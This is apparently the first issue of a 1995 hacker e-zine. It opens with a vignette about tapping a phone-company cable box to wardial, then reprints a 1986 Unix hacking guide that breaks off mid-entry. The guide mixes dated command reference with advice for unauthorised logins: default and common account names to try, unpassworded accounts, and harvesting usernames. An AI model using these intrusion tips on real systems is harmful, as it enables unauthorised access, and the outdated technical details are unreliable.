|
Issue #1 of Hackers zine (M. Scanlon). Includes
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
=09=09=09H A C K E R S
=09=09 Issue #1, August 4, 1995
=09=09 edited by: Revolution
-----------------------------------------------------------------
=09=09 Table of Contents
=46rom the editor . . . . . . . . . . . . . . . . . . Revolution
Unix Use and Security From The Ground Up . . . . . The Prophet
DBS Hackers Encounter CODE 99 (Part 1) . . . . . .David Lawson
DBS Hackers Encounter CODE 99 (Part 2) . . . . . .David Lawson
Sendmail Bugs and Exploits List v.01b . . . . . . Per1com/Xer0
Beige Boxing. . . . . . . . . . . . . . . . . . . . Revolution
I wanna be a hacker when I grow up. . . . . . . . . . . . Tarc
The End. . . . . . . . . . . . . . . . . . . . . . .Revolution
-------------------------------------------------------------------
copyright 1995 by Mike Scanlon All articles remain the property of
their authors and may be reprinted with their permission. This
zine may be reprinted freely as a whole. HACKERS is published
monthly by Mike Scanlon, to be added or dropped from the
subscription list, or to submit articles mail [email protected]
-------------------------------------------------------------------=
=20
File #1 of 8... =20
=09=09=09From the Editor
It was rather light out for two in the morning, the moon
shining in it's fullness two the west over the forest. The corner
store lights had just gone out, it's owner gone upstairs to sleep,
as the rest of the residents of this small upstate New York
community had done hours ago.
Except one.
A laptop computer and a ripped up phone jack were the only
pieces of equipment that made this teenager mysteriously different
than the other troublemakers out at this hour.=20
At the foot of the bridge stood a large telephone pole, which
held a box at it's bottom labled MIRROR IMAGE CABLE. Two handles
were undone and a thousand pairs of terminals were uncovered.=20
Terminals to the world. Two alligator clips were attached to a
predetermined pair, a roll of wire unwound into the forest, and the
laptop was jacked in and booted up. A program called autoscan was
called, and the teenager unrolled a sleeping bag, and ate twinkies
while the program ran. =20
Eventually, he undid the laptop and went home, with another
list of numbers to try, another list of worlds to explore.
The story above describes one species of the diverse kingdom
of hackers. This zine is by, for, and about every species in that
mysterious kingdom. I began this zine to start where Mondo 2000
and Wired left off: reality. Who are the hackers? =20
I hope for this zine to not only become a repository for
articles about hacks, but also about hackers. So if you have
something to write about a hack you've accomplished, such as most
of the articles that line this issue's electrons, send it in. But
if you have an article about hackers, what you think about them,
whether it be hackers in the Mitnick sense or in the Levy sense, by
all means send that in also.
Although I am always welcome to any and all submissions, I
have a few thigs in mind for the next issue which I hope someone
out there will have some input on: pirate radio, recent phreaking
techniques, and some philosophy on the hacker ethic. All comments
and criticisms go to [email protected]. =20
* * * * * * * * * * * * * * * * * * * * * * *
As always, the standard disclaimer applies...all of these articles
are for informational purposes only, Mike Scanlon and the respective
authors are not responsible for any illegal acts caused by that=20
information.
-------------------------------------------------------------------
File #2 of 8, an oldie but goodie...
=09=09=20
=09 =20
=09=09*************************************************
=09=09*************************************************
=09=09** **
=09=09** Unix Use and Security From **
=09=09** The Ground Up **
=09=09** **
=09=09** by **
=09=09** **
=09=09** The Prophet **
=09=09** **
=09=09** **
=09=09*************************************************
=09=09*************************************************
December 5, 1986.
INTRODUCTION
------------
=09The Unix operating system is one of the most heavily used mainfram=
e=20
operating systems today. It runs on many different computers (Dec VAX=
's, AT&T's=20
3bx series, PDP-11's, and just about any other you can think of- incl=
uding=20
PC's), and there are many different, but pretty much similar, version=
s of it.=20
These Unix clones go by many different names- here are the most commo=
n: Xenix,=20
Ultrix, Ros, IX/370 (for the IBM 370), PCIX (for the IBM PC), and Ber=
kely (BSD)=20
Unix. This file will concentrate on AT&T System V Unix, probably the =
most=20
heavily used version. (The next most heavily used is Berkely Unix.) T=
his file=20
will cover just about everything all but THE most advanced hacker wil=
l need to=20
know about the Unix system, from the most rodent information to advan=
ced=20
hacking techniques. This is the second version of this file, and as I=
discover=20
any errors or new tricks, I will update it. This file is, to the best=
of my=20
knowledge, totally accurate, however, and the techniques in it will w=
ork just=20
as described herein. Note, that these techniques will work on System =
V Unix.=20
Not necessarily all, but most, should work on most other versions of =
Unix as=20
well. Later, if this file is received well, and there is demand for a=
nother, I=20
will release a file on yet more advanced techniques. If you wish to c=
ontact me,=20
I can be reached several ways. First, on these boards:
Shadow Spawn 219-659-1503
Private Sector 201-366-4431 (As prophet, not The Prophet...some roden=
t stole
=09=09=09 my name.)
Ripco 312-528-5020
Stalag 13 215-657-8523
Phreak Klass 2600 806-799-0016
Or at this voice message system:
800-556-7001
Box 7023
I welcome any suggestions, corrections, or feedback of any kind. And =
lastly,=20
thanks for taking the time to read this:
THE USUAL DISCLAIMER:
---------------------
=09This file is for [of course] informational purposes only. <Snicker=
> I=20
don't take responsibility for anything anyone does after reading this=
file.
_____________________________________________________________________=
__________
IDENTIFYING UNIX SYSTEMS AND LOGGING IN
---------------------------------------
=09A Unix system can easily be identified by its prompts. When you fi=
rst=20
connect to a Unix system, you should receive the login prompt, which =
is usually=20
"Login:" (Note, that the first character may or may not be capitalize=
d.) On=20
some systems, this prompt may be ";Login:" or "User:" (Again, the fir=
st letter=20
may or may not be capitalized.) This may be preceded by a short messa=
ge,=20
(usually something like "WARNING!!! This system is for authorized use=
rs=20
only!"), the name of the company that owns the system, or the uucp ne=
twork name=20
of the system. (The uucp facilities will be explained in detail later=
.) At this=20
point, you should enter the user name and press return. (You should b=
e in=20
lowercase if your terminal supports it.) You should then receive the =
password=20
prompt, "Password:" (And yet again, the "P" may or may not be capital=
ized.) At=20
this point, you should enter your password and press return. If you h=
ave=20
specified the correct username/password pair, you will then be admitt=
ed into=20
the system. If you have entered a non-existant username or an incorre=
ct=20
password, you will receive the message "Login incorrect" and will be =
returned=20
to the login prompt. There is little information given before login, =
and there=20
is no way to find valid usernames from pre-login information.
=09There are no "default" passwords in Unix. When the system is initi=
ally=20
set up, none of the default accounts or any of the accounts created b=
y the=20
system operators has a password, until the system operator or the acc=
ount owner=20
set one for the account. Often, lazy system operators and unwary user=
s do not=20
bother to password many (and in some cases, all) of these accounts. T=
o log in=20
under an account that doesn't have a password, you have only to enter=
the=20
username at the login prompt.=20
=09You may encounter some occasional error messages when attempting t=
o log=20
in under certain accounts. Here are some of the more common messages,=
and their=20
causes:
=091. "Unable to change directory to /usr/whatever"-This means that t=
he=20
=09=09account's home directory, the directory which it is placed in
=09=09upon logon, does not exist. On some systems, this may prevent
=09=09you from logging under that account, and you will be returned
=09=09to the login prompt. On other systems, you will simply be
=09=09placed in the root directory. If this is the case, you will
=09=09see the message "Changing directory to '/'".
=092. "No shell"-this means that the account's shell, or command=20
=09=09interpreter does not exist. On some systems, the account will
=09=09not be allowed to log in, and you will be returned to the login
=09=09prompt. On other systems, the account will be admitted into the
=09=09system using a default shell, usually the Bourne shell. (The=
=20
=09=09shell will be explained later.) If this is the case, you will
=09=09see the message "Using /bin/sh".
UNIX ACCOUNTS
-------------
=09There are two types of Unix accounts-user and superuser accounts. =
User=20
accounts are the normal user accounts. These accounts have no privile=
ges.=20
Superuser accounts are the system operator accounts. These accounts h=
ave full=20
privileges, and are not bound by the file and directory protections o=
f other=20
users. In Unix, there is no hierarchy of privileges-either an account=
has full=20
privileges, or it has none.
=09Unix usernames are up to 14 characters long, but usually are withi=
n the=20
range of 1-8. The usernames can contain almost any characters, includ=
ing=20
control and special characters. (The accounts will usually not contai=
n the=20
characters @, control-d, control-j, or control-x, as these characters=
have=20
special meanings to the Unix operating system.) The Unix system comes=
initially=20
configured with quite a few default accounts, some of which are super=
user and=20
some of which are only user-level accounts. Here is a list of the def=
ault=20
accounts which usually have superuser privileges:
root (Always!)
makefsys
mountfsys
umountfsys
checkfsys
The root account is always present on the system, and always has supe=
ruser=20
capabilities. (Note: most Unix System V systems come initially set up=
with a=20
security feature that prevents superuser accounts from logging in rem=
otely. If=20
you attempt to log in under a superuser account remotely on a system =
with this=20
feature, you will receive the message "Not on console", and will be r=
efused=20
admission to the operating system. This will NOT prevent you from usi=
ng=20
superuser accounts remotely-you simply have to log in under a user ac=
count and=20
then switch over to a superuser account using the su utility, which w=
ill be=20
described later.)
Here is a list of the user-level default accounts:
lp
daemon
trouble
nuucp
uucp
bin
rje
adm
sysadm
sync
The bin account, although it is only a user account, is particularly =
powerful,=20
as it has ownership of many of the system's important directories and=
files.=20
Although these are the only default accounts on System V Unix, there =
are many=20
other accounts which I have found to be common to many Unix systems. =
Here is a=20
list of some of the accounts I have found on many Unix systems:
batch admin user demo test
field unix guest pub publi=
c
standard games general student help
gsa tty lpadmin
Also try variations on the account names, such as rje1, rje2, user1, =
user2,=20
etc. Also, try variations on people's names and initials, such as doe=
j, doe,
john, johnd, jjd, etc.
=09No matter what the format for the usernames, one thing is common t=
o all=20
systems-almost all of the usernames will begin with a lowercase lette=
r. There=20
is a good reason for this-when logging into the system, if the first =
character=20
of the username you type in is in uppr-case, the system automatically=
assumes=20
that your terminal does not support lower-case. It will then send all=
output to=20
you in upper-case, with characters that are supposed to be upper-case=
preceded=20
by a backslash ("\", the Unix escape character), to differentiate the=
m from the=20
characters which are meant to be in lower-case. Unix *always* differe=
ntiates=20
between the cases, so it is best to stay in lower-case while on the s=
ystem.
=09As mentioned before, there are no "default" passwords on Unix. Whe=
n an=20
account is created, it has no password, until the superuser or the ac=
count's=20
owner sets one for it. Unix passwords are a maximum of 11 characters.=
The=20
password may contain any character, and the system distinguishes betw=
een upper=20
and lower case characters. Many Unix systems implement a special secu=
rity=20
feature under which passwords must contain at least 2 non-alphanumeri=
c=20
characters (similar to Compuserve's password protection). Yet another=
password=20
security feature of Unix allows the superuser to set an expiration da=
te on=20
users' passwords.
COMMAND LOGINS
--------------
=09Many systems have accounts known as "command logins". These are=
=20
accounts that log in, execute a single command, and are then logged o=
ut. These=20
accounts rarely have passwords. Here is a list of common command logi=
ns:
who -This is a particularly useful command login. When you enter =
this at
=09the username of a system with this particular account, the system =
will
=09display a list of the users currently on the system. A good way to=
get
=09valid usernames to hack.
time -Not very useful. Just displays the time.
date -Ditto the above, but displays the current date. Great if you=
don't=20
=09have a calendar.
sync -This default account is sometimes set up as a command login.=
It merely
=09executes the sync command, which causes any data which is meant to=
be
=09stored to be written to disk.
UNIX SPECIAL CHARACTERS
-----------------------
=09The Unix operating system interprets certain characters in special=
=20
ways. Provided here is a list of those special characters, and their =
meanings=20
to the Unix operating system:
Control-D -This is the Unix end-of-file character.
Control-J -Some systems interpret this, rather than Control-M, =
as the=20
=09=09return character, while others may use both. The vast majority,=
=20
=09=09however, will only use Control-M.
Control-Delete -This is the Unix kill character. It will automatical=
ly end=20
=09=09your current process.
@ -Some systems use this as the kill character.
\ -This is the Unix escape character. Its main use it t=
o=20
=09=09differentiate between upper- and lower-case characters when=
=20
=09=09logged in on a terminal that only supports upper-case. For=20
=09=09instance, if you wanted to send the command "cd /Mrs/data",
=09=09(never mind what it does right now), you would type this:
=09=09(this is how it would look on your upper-case only terminal)
=09=09CD /\MRS/DATA
=09=09The backslash before the M would let the system know that the M=
=20
=09=09supposed to be upper-case, while the others would simply be=
=20
=09=09interpreted as lower-case.
=09The characters will rarely be used in usernames and passwords beca=
use=20
of the way they are interpreted. Note, however, that these values may=
usually=20
be changed once inside the system using the stty command, which will =
be=20
explained later. for instance, the end of file character could be cha=
nged to=20
control-A if you wished.
THE UNIX SHELL
--------------
=09The Unix shell is the command interpreter program that accepts you=
r=20
input and carries out your commands. It is NOT the operating system i=
tself, it=20
is the interface between the user and the operating system. The shell=
is a=20
program that is executed when you are logged in, and when you end the=
shell=20
program, you are logged out of the system. There is nothing special a=
bout the=20
shell program-it is just a regular program, like any other on the Uni=
x system.=20
In fact, once you are logged on, you can execute another shell just a=
s you=20
would execute a program. This ability, to run multiple shell levels, =
can be=20
used to perform some interesting tricks that will be detailed later i=
n this=20
file. There is also more than one kind of shell. All the shells perfo=
rm the=20
same basic function of interpreting the user's commands, but there ar=
e a few=20
differences. Here is a list of the different shells, their unique=
=20
characteristics, and how to tell which shell you are using:
Shell
-----
sh -This is the Bourne shell, the standard shell of Unix System =
V, and the
=09focus of this file. This shell gives user-level accounts a command=
=20
=09prompt of "$", and "#" for superuser accounts. On Berkely BSD Unix=
,
=09this shell gives an ampersand ("&") prompt.
csh -This is the C shell, developed by the Berkely University Sci=
ence=20
=09department. This shell is pretty much the same as the Bourne shell=
, but
=09features different shell programming control structures [shell=
=20
=09programming will be explained later, in the section on Unix softwa=
re
=09development], and has a few luxuries such as aliasing (giving a co=
mmand=20
=09or a series of commands a new name), and it keeps a history of the=
=20
=09commands you enter. This shell gives a "%" prompt for user account=
s and
=09a "#" prompt for superuser accounts.=20
ksh -This is the new, Korn shell. This shell combines features of=
both the=20
=09Bourne shell and the C shell. It boasts the Bourne shell's easier =
shell
=09programming, along with the C shell's aliasing and history. Its pr=
ompts
=09are "$" for users and "#" for superusers.
rsh -This is the restricted Bourne shell. It is used for accounts=
that the
=09superuser wishes to restrict the commands available to. It will no=
t=20
=09allow you to execute commands outside of your searchpath (which wi=
ll be
=09explained later, also, in the section on software development), an=
d=20
=09will not let you change directories or change the values of shell
=09variables. In all other respects, it is similar to the Bourne shel=
l. A=20
=09later section of this file will detail ways to overcome the
=09restrictions of this shell.
ua -This is a lousy, menu-driven shell for the AT&T Unix PC. (Ye=
s, there
=09are some of those with dialups!) It implements a lousy windowing
=09system that is SLOOOW, even at 2400 baud. Luckily, you can exit to=
the
=09Bourne shell from the ua shell.
=09These are by no means all of the shells you will run across. These=
are=20
only the "official" shells provided by the distributors of the Unix o=
perating=20
system. I've run across many "home-made" shells in my time. Also, any=
compiled=20
program can be used as a shell. For instance, I've used systems run b=
y=20
businesses where one account logged in using an accounting program as=
a shell.=20
This prevented the account from being used to do anything other than =
use the=20
accounting program. Other good examples of this are the command login=
s-the who=20
command login, for example, uses the who program as its shell. When t=
he program=20
is finished, the account is logged out. You will most definitely enco=
unter=20
other such accounts as you hack Unix.
UNIX FILES AND DIRECTORIES
--------------------------
=09Unix files and directories are referenced with pathnames, a la MS-=
DOS.
If you are familiar with MS-DOs, then you should have no problem unde=
rstanding=20
this section. Unix files and directories are referenced in the almost=
the exact=20
same way-the only difference is that it uses the "/" character, not t=
he=20
backslash, to separate the directories in the pathname.
=09Pathnames are a simple concept to understand, but are difficult to=
=20
explain. Imagine the system's files and directories laid out in a tre=
e fashion,=20
like this:
=09=09=09=09/ (root directory)
=09=09=09=09:
=09=09=09=09:
=09=09=09-------------------------
=09=09=09: :
=09=09=09: :
=09=09=09usr (dir) bill (dir)
=09=09=09: :
=09=09 -------------- --------------
=09=09 : : : :
=09 junk (file) source (dir) memo (file) names (file)
=09=09=09 :
"/" is the root directory. This is the top directory in the system tr=
ee, and=20
all other files and directories are referenced in relation to this di=
rectory.=20
The root directory has 2 subdirectories in it, "usr" and "bill". In t=
he usr=20
directory, there is a file called "junk" and an empty directory calle=
d=20
"source". In the directory bill, there are 2 files, "memo" and "names=
". You=20
specify pathnames by starting at the top of the system, "/", and trac=
ing your=20
way down the system tree to the file or directory you wish to referen=
ce,=20
separating each directory you must pass through to get to it with a s=
lash. For=20
instance, the pathname of the file "junk" would be "/usr/junk". The p=
athname of=20
the usr directory would be "/usr". The pathname of the source directo=
ry would=20
be "/usr/source". The pathname of the bill directory would be "/bill"=
, and the=20
pathnames of the 2 files which reside in it would be "/bill/memo" and=
=20
"/bill/names".
=09Files and directories can also be referenced by their base names i=
f=20
they are in your current directory. For instance, if you were in the =
directory=20
"usr", you could reference the file "/usr/junk" by its base name, "ju=
nk". If=20
you were in the root directory, you could reference the bill director=
y by its=20
base name, "bill". You can reference the file directly above your cur=
rent=20
directory in the system tree as ".." and your current directory can b=
e=20
referenced as "."
=09Unix file and directory names can be up to 14 characters in length=
. The
filename can contain any ASCII character, including control character=
s, except
a space. It may contain both upper- and lower-case, and Unix does dis=
tinguish
between the two. Unix does not use filename extensions, a la VMS or M=
S-DOS, to=20
show the kind of file a file is. A period, in Unix, is just another c=
haracter=20
in the filename, not a separator between 2 fields in the name. File n=
ames which=20
begin with a period are called "hidden" files-that is, they are only =
revealed=20
if you issue a special command.
=09There are 3 kinds of files in Unix. These are text files, binary f=
iles,
and device files. Text files are just what you'd think they are from =
the name-
files of ASCII text, just like what you're reading right now. Binary =
files are
executable machine-code files. (There are also executable text files,=
called=20
shell scripts, that will be explained in detail in the section on Uni=
x software=20
development.) Device files are files that represent the system's I/O =
devices-
disk drives, terminals, etc. Remember, that Unix was created as an en=
viroment=20
for software development. Its designers wished for programs written f=
or Unix=20
systems to be as transportable between different models of machines r=
unning=20
the operating system as possible. By representing the I/O devices as =
files,=20
they eliminated the incompatability in the code that handled I/O. The=
program=20
simply has to read and write from/to the file, and the Unix operating=
system=20
handles the system-dependant details.
BASIC UNIX COMMANDS
-------------------
=09This section will describe some basic Unix commands, and detail ho=
w to=20
get further help on-line. It will briefly provide the syntax for a fe=
w commands=20
you will find necessary to know in order to find your way around on t=
he system.
=09Unix will usually only require that you use the base name of a fil=
e or=20
directory you wish to reference if it is in the directory you are cur=
rently in.=20
Most commands will also let you specify full pathnames if you wish to=
reference=20
files in other parts of the system. Most commands will also let you u=
se several=20
wildcard characters when referencing files and directories. These are=
:
? -This means to accept any single character in the place of th=
e question
=09mark. For instance, "t?m" would include both "tom" and "tim".
* -This means to accept any character, group of characters, or =
nothing in
=09the position of the asterisk. For example, "t*m" would include "th=
om",
=09"tom", and "tim".
[] -This means to accept any character within the brackets in th=
e position=20
=09of the brackets. For instance, "t[oia]m" would include "tom", "tim=
",=20
=09and "tam". You can also specify a range of characters in the brack=
ets=20
=09by using a hyphen. For instance, "t[a-c]m" would include "tam", "t=
bm",
=09and "tcm".
=09Most commands and programs in Unix take their input from the keybo=
ard=20
and send their output to the screen. With most commands and programs,=
however,=20
you can instruct them to draw their input from a text file and redire=
ct their=20
output to another file instead. For instance, assume there is a progr=
am on the=20
system called "encrypter", that takes its input from the keyboard, en=
crypts it,=20
and displays the encrypted data on the screen. You could instruct the=
program=20
to take its input, instead, from a previously prepared text file usin=
g the=20
input redirection character, "<". In Unix, as in MS-DOs (which is bas=
ed in part=20
on Unix), you execute a program by typing its name. You wish the prog=
ram to=20
take its input from a file in the directory you are currently in call=
ed=20
"top_secret". You would type "encrypter < top_secret". The program wo=
uld then=20
read in the contents of the file top_secret and encrypt it, then prin=
t out the=20
encrypted form on the screen. Suppose you wanted to use the encrypter=
program=20
to encrypt files you wished to keep private? You could redirect the e=
ncrypted=20
output from the screen into another file. To do this, you would use t=
he output=20
redirection character, ">". Say, you wished to save the output in a f=
ile called=20
"private". You would type "encrypter < top_secret > private". The enc=
rypter=20
program would then read in the contents of the file top_secret and wr=
ite the=20
encrypted output into the file "private". Nothing would be displayed =
to the=20
screen. If the file private does not exist, it will be created. If it=
=20
previously existed, its contents will be erased and replaced with the=
output=20
=66rom the encrypter program. Perhaps you would want to add to the co=
ntents of a=20
file rather than replace its contents? This is done with ">>". The co=
mmand=20
"encrypter < top_secret >> private" would append the output from the =
encrypter=20
to the current contents of the file private. Again, if the file priva=
te does=20
not already exist, it will be created.
=09Most commands have one or more options that you can specify. These=
are=20
placed after the command itself in the command line, and preceded by =
a hyphen.=20
For instance, let's say that the encrypter program had an option call=
ed=20
"x", which caused it to use a different encoding algorithm. You would=
=20
specify it by typing "encrypter -x". If a command has two or more opt=
ions, you
can usually specify one or more together in a stream. For instance, l=
et's say=20
that the encrypter program has 2 options, x and y. You could specify =
both like=20
this: "encrypter -xy". If one or more of the options requires an argu=
ment, for=20
example the x option requires a 2 character key, you can specify the =
options=20
separately, like this: "encrypter -xaa -y", where aa is the 2-charact=
er key.=20
=09The pipe character, "|", is used to channel the output of one comm=
and=20
or program into the input of another. For instance, suppose you had a=
command=20
called "report" that formatted documents into report format, and you =
had a file=20
called "myreport" that you wished to view in the report format. You c=
ould type:
"cat myreport" | report". This would type out the contents of the fil=
e myreport=20
to the report command rather than the screen, and the report command =
would=20
format it and display it on the screen. (Note: this example could hav=
e been=20
done with I/O redirection by typing "report < myreport"...but it make=
s a good=20
example of the use of pipes.)
=09You can choose to execute commands and programs in the background-=
that=20
is, the command executes, but you are free to carry out other tasks i=
n the=20
meantime. To do this, type in the command line, followed by " &". For=
instance,=20
"rm * &" would delete all the files in the directory, but your termin=
al would
not be tied up. You would still be free to perform other tasks. When =
you do=20
this, the system will print out a number and then return you to the s=
ystem=20
prompt. This number is the process number of the command. Process num=
bers will=20
be explained later in this section in the entry for the command "ps".=
The=20
command can be stopped before its completion with the kill command, a=
lso=20
explained in this section. Example:
=09$rm * &
=091234
=09$
Note that when you use background processing, the command or program =
will still=20
takes its input from the keyboard (standard input device) and send it=
s output=20
to the screen (standard output device), so if you wish for the comman=
d to work=20
in the background without disturbing you, you must redirect its input=
(if any)=20
and its output (if it's to the screen).
THE COMMANDS
------------
ls -This command lists the files and subdirectories in a directo=
ry. If you=20
=09simply type "ls", it will display the files in your current direct=
ory.=20
=09You can also specify the pathname of another directory, and it wil=
l=20
=09display the files in it. It will not display hidden files (files w=
hose
=09name begins with a period).=20
=09Options:
=09a -This option will display all files, including hidden file=
s.
=09Example:
=09$ ls -a
=09. .. junk source
=09$
cd -This is the command used to move from one directory to anoth=
er. To go=20
=09to a directory directly below your current directory, type "cd=
=20
=09<dirname>". To move up to the directory directly above your curren=
t=20
=09directory, type "cd .." You can also jump to any directory in the=
=20
=09system from any other directory in the system by specifying the pa=
th-
=09name of the directory you wish to go to, such as "cd /usr/source".
=09Example:
=09$cd /usr/source
=09$
pwd -This prints out the pathname of the directory you are curren=
tly in.=20
=09Useful if you forget where you're at in the system tree.
=09Example:
=09$pwd
=09/usr/source
cat -Displays the contents of a text file on the screen. The corr=
ect syntax=20
=09is "cat <filename>". You can use basenames or pathnames.
=09Example:
=09$cat memo
=09Bill,=20
=09 Remember to feed the cat!
=09-Martha
=09$
rm -This deletes a file. Syntax: "rm <filename>".
=09Example:
=09$rm junk
=09$
cp -Copies a file. Syntax: "cp file1 file2", where file1 is the =
file you
=09wish to copy, and file2 is the name of the copy you wish to create=
. If=20
=09file2 already exists, it will be overwritten. You may specify path=
names
=09for one or both arguments.
=09Example:
=09$cp /usr/junk /usr/junk.backup
stty -Displays/sets your terminal characteristics. To display the =
current=20
=09settings, type "stty". To change a setting, specify one of the opt=
ions
=09listed below.
Options:
echo -System echoes back your input.
noecho -System doesn't echo your input.
intr 'arg' -Sets the break character. The format is '^c' for con=
trol-c,=20
=09=09etc. '' means no break character.
erase 'arg' -Sets the backspace character. Format is '^h' for con=
trol-h,
=09=09etc. '' means no backspace character.
kill 'arg' -Sets the kill character (which means to ignore the l=
ast line
=09=09you typed). Format is the same as for intr and erase,=20
=09=09'^[character]', with '' meaning no kill character.
=09Example:
=09$stty intr '^c' erase '^h'
=09$stty
=09stty -echo intr '^c' erase '^h' kill '^x'
=09
lpr -This command prints out a file on the Unix system's printer,=
for you=20
=09to drop by and pick up (if you dare!) The format is "lpr <filename=
>".
=09Example:
=09$lp junk
ed -This is a text file line editor. The format is "edit <filena=
me>". The=20
=09file you wish to modify is not modified directly by the editor; it=
is=20
=09loaded into a buffer instead, and the changes are only made when y=
ou=20
=09issue a write command. If the file you are editing does not alread=
y=20
=09exist, it will be created as soon as issue the first write command=
.=20
=09When you first issue the edit command, you will be placed at the
=09command prompt, ":" Here is where you issue the various commands. =
Here
=09is list of some of the basic editor commands.
=09# -This is any number, such as 1, 2, etc. This will move you=
down=20
=09=09to that line of the file and display it.
=09d -This deletes the line you are currently at. You will then=
be
=09=09moved to the previous line, which will be displayed.
=09a -Begin adding lines to the file, just after the line that =
you=20
=09=09are currently on. This command will put you in the text input
=09=09mode. Simply type in the text you wish to add. To return to the
=09=09command mode, type return to get to an empty line, and press
=09=09the break key (which is whatever character you have set as your
=09=09break key). It is important to set the break character with=
=20
=09=09stty before you use the editor!
=09/ -Searches for a pattern in the file. For example, "/junk" =
would
=09=09search the file from your current line down for the first line
=09=09which contains the string "junk", and will move you to that=
=20
=09=09line if it finds one.
=09i -Insert. Works similar to a, except that the text is inser=
ted
=09=09before the line you are currently on.
=09p -Prints out a line or lines in the buffer. "p" by itself w=
ill
=09=09display your current line. "#p" will display the line "#".=20
=09=09You may also specify a range of lines, such as "1,3p" which
=09=09will display lines 1-3. "1,$p" will print out the entire file.
=09w -Write the changes in the buffer to the file.
=09q -Quit the editor.
=09Example:
=09$edit myfile
=09Editing "myfile" [new file]
=090 lines, 0 characters
=09:a
=09I am adding stupid text to myfile.
=09This is a test.
=09^c [this is assumed as a default break character in this example]
=09:1,$p
=09I am adding stupid text to myfile.
=09This is a test.
=09:2
=09This is a test.
=09:d
=09I am adding stupid text to myfile.
=09:w
=09:q
=09$
grep -this command searches for strings of text in text files. The=
format is
=09grep [string] [file]. It will print out every line in the file tha=
t=20
=09 contains the string you specified.
=09Options:
=09v -Invert. This will print out every line that DOESN'T conta=
in
=09=09the string you specified.
=09Example:
=09$ grep you letter
=09your momma!
=09I think you're going to get caught.
=09$
who -This will show the users currently logged onto the system.
=09Example:
=09$ who
=09root console Mar 10 01:00
=09uucp contty Mar 30 13:00
=09bill tty03 Mar 30 12:15
=09$
=09Now, to explain the above output: the first field is the username =
of=20
=09the account. The second field shows which terminal the account is =
on.
=09Console is, always, the system console itself. On many systems whe=
re
=09there is only one dialup line, the terminal for that line is usual=
ly=20
=09called contty. the tty## terminals can usually be either dialups o=
r
=09local terminals. The last fields show the date and time that the u=
ser
=09logged on. In the example above, let's assume that the current tim=
e and
=09date is March 30, and the time is 1:00. Notice that the time is in=
24=20
=09hour format. Now, notice that the root (superuser) account logged =
in on
=09March 10! Some systems leave the root account logged in all the ti=
me on
=09the console. So, if this is done on a system you are using, how ca=
n you
=09tell if the system operator is really online or not? Use the ps=
=20
=09command, explained next.
ps -This command displays information about system processes.
=09Options:
=09u -this displays information on a specific user's processes.=
For
=09=09instance, to display the root account's processes:
=09=09$ ps -uroot
=09=09PID TTY TIME CMD
=09=091234 console 01:00 sh
=09=091675 ? 00:00 cron
=09=091687 console 13:00 who
=09=091780 tty09 12:03 sh
=09=09Now, to explain that: The first field is the process number.=
=20
=09=09Each and every time you start a processes, running a program,
=09=09issueing a command, etc., that process is assigned a unique=
=20
=09=09number. The second is which terminal the process is being run
=09=09on. The third field is when the process was started. The last
=09=09field is the base name of the program or command being run.
=09=09A user's lowest process number is his login (shell) process.
=09=09Note that the lowerst process in the above example is 1234.=
=20
=09=09This process is being run on the console tty, which means the
=09=09superuser is logged on at the system console. Note the ? as the
=09=09tty in the next entry, for the cron process. You can ignore any
=09=09processes with a question mark as the terminal. These processes
=09=09are not bewing carried out by a user; they are being carried
=09=09out by the system under that user's id. Next, note the entry
=09=09for process # 1687, on the console terminal, "who". this means
=09=09that the superuser is executing the who command...which means
=09=09he is currently actively on-line. The next entry is interest-
=09=09ing...it shows that the root user has a shell process on the=
=20
=09=09terminal tty09! This means that someone else is logged in
=09=09under the root account, on tty09. If more than one person is
=09=09using an account, this option will display information for all
=09=09of them, unless you specify the next option...
=09t -This allows you to select processes run on a specific ter=
m-
=09=09inal. For example:
=09=09$ps -t console
=09=09will show all the processes currently being run on the console.
=09=09Example:
=09=09Remember, options can usually be combined. This will show all
=09=09the root user's processes being run on the system console:
=09=09$ ps -uroot -tconsole
=09=09PID TTY TIME CMD
=09=091234 console 01:00 sh
=09=091687 console 13:00 who
=09=09$
kill -Kills processes. Syntax: kill [-#] process#. You must know t=
he process
=09number to kill it. You can, optionally, specify an option of 1-9, =
to
=09determine the power of the kill command. Certain kinds of processe=
s,
=09like shell processes, require more power to kill. Kill -9 will sto=
p any
=09process. You must have superuser capabilities fo kill another user=
's
=09processes (unless he's using your account).
=09Example:
=09$kill -9 1234
=091234 killed.
=09$
write -This command is for on-line realtime user to user communicat=
ions. To=20
=09communicate with a user, type "write <username>". If more than one
=09person is logged in under that user name, you must specify a speci=
fic
=09terminal you wish to speak to. When you do this, the person you wi=
sh
=09to communicate with will see:
=09Message from [your account name] tty## [<--your terminal]
=09Now you can type messages, and they will be displayed on that pers=
on's
=09terminal when you press return. When you are finished, press contr=
ol-D
=09to quit.
=09Example:
=09$ write root
=09Fuck you I'm a hacker! [This is not advised.]
=09^d
=09$
mail -The Unix mail facilities, used to send/receive mail. To send=
mail,=20
=09type "mail <username>". Enter your message and press control-d to =
send.
=09To read your mail, type "mail". Your first letter will be displaye=
d,
=09and then you will be given a "?" prompt. =20
=09Here are the legal commands you give at this point:=20
=09## -Read message number ##.
=09d -Delete last message read.
=09+ -Go to next message.
=09- -Move back one message.
=09m -Send mail to user.
=09s -Save last message read. You can specify the name of the f=
ile
=09=09to which it is saved, or it will be saved to the default file,
=09=09mbox.
=09w -Same as s, but will save the message without the mail fil=
e
=09=09header.
=09x -Exit without deleting messages that have been read.
=09q -Exit, deleting messages that have been read.
=09p -Print last message read again.
=09? -Lists these commands.
=09Examples:
=09To send mail:
=09$ mail root
=09Hi bill! This is a nice system.
=09-John
=09^d
=09$
=09To read mail:
=09$ mail
=09From john Thu Mar 13 02:00:00 1986
=09Hi bill! This is a nice system.
=09-John
=09? d
=09Message deleted.
=09?q
=09$
crypt -This is the Unix file encryption utility. Type "crypt". You =
will then
=09be prompted to enter the password. You then enter the text. Each l=
ine
=09is encrypted when you press return, and the encrypted form is disp=
layed
=09on the screen. So, to encrypt a file, you must use I/O redirection=
.
=09Type "crypt [password] < [file1] > [file2]". This will encrypt the=
con-
=09tents of file1 and place the encrypted output in file2. If file 2 =
does
=09not exist, it will be created.
passwd -This is the command used to change the password of an accoun=
t. The
